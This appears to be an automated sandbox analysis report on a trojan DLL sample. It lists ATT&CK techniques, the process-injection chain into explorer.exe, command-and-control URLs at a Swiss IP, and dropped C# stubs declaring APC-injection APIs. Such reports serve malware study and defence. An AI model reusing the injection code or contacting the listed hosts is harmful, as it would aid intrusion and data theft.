                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)Logon Script (Windows)1
                      Masquerading                      		Security Account Manager1
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
                      Virtualization/Sandbox Evasion                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script812
                      Process Injection                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Rundll32                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 620333 Sample: tIJVb0BvkI.dll Startdate: 04/05/2022 Architecture: WINDOWS Score: 100 58 Snort IDS alert for network traffic 2->58 60 Found malware configuration 2->60 62 Multi AV Scanner detection for submitted file 2->62 64 2 other signatures 2->64 11 loaddll32.exe 1 2->11         started        13 mshta.exe 19 2->13         started        process3 process4 15 cmd.exe 1 11->15         started        17 powershell.exe 33 13->17         started        process5 19 rundll32.exe 1 6 15->19         started        23 csc.exe 3 17->23         started        26 csc.exe 3 17->26         started        28 conhost.exe 17->28         started        dnsIp6 54 185.189.151.28, 49758, 80 AS-SOFTPLUSCH Switzerland 19->54 66 System process connects to network (likely due to code injection or exploit) 19->66 68 Writes to foreign memory regions 19->68 70 Modifies the context of a thread in another process (thread injection) 19->70 72 2 other signatures 19->72 30 control.exe 1 19->30         started        50 C:\Users\user\AppData\Local\...\2tb3qiq3.dll, PE32 23->50 dropped 33 cvtres.exe 1 23->33         started        52 C:\Users\user\AppData\Local\...\5xaibb03.dll, PE32 26->52 dropped 35 cvtres.exe 1 26->35         started        file7 signatures8 process9 signatures10 82 Changes memory attributes in foreign processes to executable or writable 30->82 84 Injects code into the Windows Explorer (explorer.exe) 30->84 86 Writes to foreign memory regions 30->86 88 4 other signatures 30->88 37 explorer.exe 2 30->37 injected process11 signatures12 74 Self deletion via cmd delete 37->74 76 Disables SPDY (HTTP compression, likely to perform web injects) 37->76 40 cmd.exe 1 37->40         started        43 RuntimeBroker.exe 37->43 injected process13 signatures14 78 Uses ping.exe to sleep 40->78 80 Uses ping.exe to check the status of other devices and networks 40->80 45 PING.EXE 1 40->45         started        48 conhost.exe 40->48         started        process15 dnsIp16 56 192.168.2.1 unknown unknown 45->56

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      tIJVb0BvkI.dll48%ReversingLabsWin32.Trojan.Jaik
                      tIJVb0BvkI.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.1060000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://185.189.151.28/0%VirustotalBrowse
                      http://185.189.151.28/0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/A_2Fp0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLE0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlk0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://185.189.151.28/ws0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQ0%Avira URL Cloudsafe
                      http://crl.microsof0%URL Reputationsafe
                      http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlk0%Avira URL Cloudsafe
                      http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umz0%Avira URL Cloudsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQQf/vX4xXJ2IWlh9/BWCOo52VZG1/qFF3rGEbDGBwji/AFMqmR1WMmM5K0LIMoI8g/D8c5DrZSEGvsAUch/2HdMta1B0ffeRMZ/k3cTTdUk82uBVmy7RF/Rr_2FL2he/DujtrSekUisPa3nAIzJG/cz1155F97esi6v8egB5/_2FIb4A5CDY4_2BdVWbog2/rBYVbP7pL/9UBLZ.jlktrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLEhKaYvKzYG/62F8wcJNe79PrlqCY04/xwdKlEWPSs9w4mnPcT_2Ft/CBh9Jka_2BBO_/2FnUOsl_/2FeukB5Oo3R7waflgs2APeC/CflAOA3Y4e/fxy536Bj3MO1PfKKA/SIX3IKWM1adU/v_2FKt6MdMc/MqBgUjh6Lil97f/dDK979RFebXcHjW4yVEWU/DckDOUNWU_2FdK/Emn7xfA9.jlktrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://185.189.151.28/rundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://185.189.151.28/drew/A_2Fprundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.189.151.28/drew/blHtwIV2gkF3APGb/H5p0FtkLiZWuAmQ/YhhCMjxxL58xCK2uAV/WcBrEd5nc/_2FWto4DjLErundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517515689.0000000000AEC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642709206.0000000000AEC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.189.151.28/wsrundll32.exe, 00000003.00000003.517525489.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://185.189.151.28/drew/MoXDvlmqf2lW3/EB1qVgQf/WMGbWvk8B3AU0qv1MnO4KKv/8mMADRXtjZ/pOzmC2TJWxSBePQrundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.microsofpowershell.exe, 0000000A.00000003.604947338.00000227AB271000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://185.189.151.28/drew/A_2FpZGEmDd1hJ/x8Dd5HmeBl3U4_2FUXOC4/CREe0umzrundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://constitution.org/usdeclar.txtC:rundll32.exe, 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.189.151.28
                      		unknownSwitzerland
                      		51395AS-SOFTPLUSCHtrue

                      Private

                      IP
                      192.168.2.1

                      General Information

                      Joe Sandbox Version:34.0.0 Boulder Opal
                      Analysis ID:620333
                      Start date and time: 04/05/202216:26:192022-05-04 16:26:19 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 12m 2s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:tIJVb0BvkI.dll
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                      Number of analysed new started processes analysed:24
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:2
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal100.bank.troj.evad.winDLL@24/15@0/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HDC Information:
                      • Successful, ratio: 85.8% (good quality ratio 82.2%)
                      • Quality average: 82.1%
                      • Quality standard deviation: 27%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .dll
                      • Adjust boot time
                      • Enable AMSI
                      • Override analysis time to 240s for rundll32

                      Warnings

                      • Exclude process from analysis (whitelisted): audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                      • TCP Packets have been reduced to 100
                      • Excluded IPs from analysis (whitelisted): 13.107.42.16
                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, l-0007.l-msedge.net, arc.msn.com, config.edge.skype.com
                      • Execution Graph export aborted for target mshta.exe, PID 6756 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      16:28:24API Interceptor15x Sleep call for process: powershell.exe modified

                      Joe Sandbox View / Context

                      IPs

                      No context

                      Domains

                      No context

                      ASNs

                      No context

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):11606
                      Entropy (8bit):4.883977562702998
                      Encrypted:false
                      SSDEEP:192:h9smd3YrKkGdcU6CkVsm5emla9sm5ib4q4dVsm5emdjxoeRjp5Kib4nVFn3eGOVo:ySib4q4dvEib4nVoGIpN6KQkj2frkjhQ
                      MD5:243581397F734487BD471C04FB57EA44
                      SHA1:38CB3BAC7CDC67CB3B246B32117C2C6188243E77
                      SHA-256:7EA86BC5C164A1B76E3893A6C1906B66A1785F366E092F51B1791EC0CC2AAC90
                      SHA-512:1B0B1CD588E5621F63C4AACC8FF4C111AD9148D4BABE65965EC38EBD10D559A0DFB9B610CA3DF1E1DD7B1842B3E391D6804A3787B6CD00D527A660F444C4183A
                      Malicious:false
                      Preview:PSMODULECACHE.....7.t8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope.........w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider...........e...[...C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package...

                      C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):403
                      Entropy (8bit):5.058106976759534
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y
                      MD5:99BD08BC1F0AEA085539BBC7D61FA79D
                      SHA1:F2CA39B111C367D147609FCD6C811837BE2CE9F3
                      SHA-256:8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9
                      SHA-512:E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class bju. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr wqyemwbu,IntPtr vlbfvx,IntPtr hokikv);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uqvnjbf,uint pmyb,IntPtr rheqdsvorya);.. }..}.

                      C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):371
                      Entropy (8bit):5.243693039966474
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fqjzxs7+AEszI923fqe:p37Lvkmb6KzWWZE2r
                      MD5:2ED921F1330955F6AFDBB78FA7EAF8F4
                      SHA1:DB24B6EE559C4B25D8F92DD574D95BA7354D9E3D
                      SHA-256:2049BE5CF51E976F56978650CDF497A93641D8DC063B73D195CAF84D280AF0A1
                      SHA-512:34AC6D80B7658F3787B740881DB9CC46724FC2586F8ED2B076E68C59F827C1C96C0E8BC0E0BF7CEE0CDB7C29815BF42F32FCBAC3CD395839E6B70EEE230F42B1
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.0.cs"

                      C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.6162239107618914
                      Encrypted:false
                      SSDEEP:24:etGS/8OmU0t3lm85xWAseO4zkQ64pfUPtkZfqmPVUWI+ycuZhNyoakST9PNnq:6dXQ3r5xNOnQfUuJqmd31ulna3rq
                      MD5:89A7D7E72EE4D68C3E0A507D7151F2CE
                      SHA1:89E10E370DE870B07976D508379CA908642B2D98
                      SHA-256:4A403CD94F5DFDDF2C7813781CC570EB1D59EE10DD89774CC30B6AF3BA694B81
                      SHA-512:CAAB903ABFEB4B382EA85182B4820A82A1A6D70C5A1D1F697BFD31487290354F08005E7DBEF03C3FABBF9757D261EE6235F490E05824BADFCF04B45A47344A14
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...&.sb...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....*BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....p.....w.....~...............a. ...a...!.a.%...a.......*.....3.0.....6.......C.......V...........

                      C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                      Category:modified
                      Size (bytes):868
                      Entropy (8bit):5.339579234164359
                      Encrypted:false
                      SSDEEP:12:xKIR37Lvkmb6KzWWZE2qKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KznE2qKaM5DqBVKVrdFAMBJTH
                      MD5:7A6F4E96A8D3B3A4C8AF231DDFFDE508
                      SHA1:7EAE899EE47B06783142610DF27ACDEB0F686EC3
                      SHA-256:00DF50BF3A6286D2D1FC5FA1951B22E04370B59802960AFC5BA77EBF21A6647C
                      SHA-512:E75F43E8905AA37E43BDD7D976BB7A84CE521097FA58FEB2CF77436A3688C77F98B3AC12A5D7244DECCE53849D7CD1F25B53E899748E83B00A0DCBECAB3FD014
                      Malicious:false
                      Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                      C:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:MSVC .res
                      Category:dropped
                      Size (bytes):652
                      Entropy (8bit):3.109354189483703
                      Encrypted:false
                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryZWoak7YnqqqW9PN5Dlq5J:+RI+ycuZhNyoakST9PNnqX
                      MD5:D66AF6FAC9C9D4F1F78AE3A5DC5349E5
                      SHA1:121B0B2A4DC1FC76073D0B9E738768EFF1FD34C9
                      SHA-256:89C80B6EA10BBDEC2FDF0A878C09D3261BD42E09764A38D7F155B4E89894A06C
                      SHA-512:E63B88E36F531BDCDBAE8816D7ED486CD6F6D6F9E307EE228599A213E022423900AC82CB4FAEAB3E30CB0BCBC077C3C9CFADD53FEF5C7D7CEF60E09011DAE54D
                      Malicious:false
                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...2.t.b.3.q.i.q.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...2.t.b.3.q.i.q.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                      C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.0.cs

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text
                      Category:dropped
                      Size (bytes):392
                      Entropy (8bit):4.988829579018284
                      Encrypted:false
                      SSDEEP:6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy
                      MD5:80545CB568082AB66554E902D9291782
                      SHA1:D013E59DC494D017F0E790D63CEB397583DCB36B
                      SHA-256:E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C
                      SHA-512:C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D
                      Malicious:false
                      Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class buvbcy. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint jujqjjcr,uint fvu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr fnpqam,uint ecktq,uint arixnpjcmw,uint mbhifa);.. }..}.

                      C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                      Category:dropped
                      Size (bytes):371
                      Entropy (8bit):5.229282846983885
                      Encrypted:false
                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fp+zxs7+AEszI923fR:p37Lvkmb6KzsWZE2J
                      MD5:8790EA5EBD20665A121C0467D12D0F98
                      SHA1:560171D6E50CA52CB0F3179EE861D66954DFEE36
                      SHA-256:82375D2231FDCA453FFBF57DE02F36378A4A1154A7B935AAC10D766F88CF0E40
                      SHA-512:9A9EFBDC23DAF0910E5775EB4FE052B6CCA5439A4D5BF667151FCD0E055DE8F178233F7D1E209059352F00B1897FE448C9526631472401D581FBFC84AAE7C759
                      Malicious:false
                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.0.cs"

                      C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dll

                      Download File
                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):3584
                      Entropy (8bit):2.59433860543945
                      Encrypted:false
                      SSDEEP:24:etGSV/u2Bg85z7xlfwZD6sgdWqtkZfoAWI+ycuZhNyakS6PNnq:6oYb5hFCD6FWdJo71ulya32q
                      MD5:56795B9251ADDEDC268AA628E143A9C5
                      SHA1:16973C86A02C9B3D307AA25A3ADAD1F0F05F1325
                      SHA-256:E28D2E06D00EA056EE86C6793AED037BD75A6DFD1D63100378CDDE049C5A7C9E
                      SHA-512:D0584C6B57A34BB7A3224B739870A4CB6BC87DA8A4D355C3A72AEED08106D3C019096A5627AB26D6CC007EF907725149BB21FF85E4D1D82BABA33923C0778051
                      Malicious:false
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.sb...........!.................#... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..T.............................................................(....*BSJB............v4.0.30319......l...H...#~......4...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......`.........f.....o.....s.....z...............`. ...`...!.`.%...`.......*.....3.+.....9.......K.......S...........

                      C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.out

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
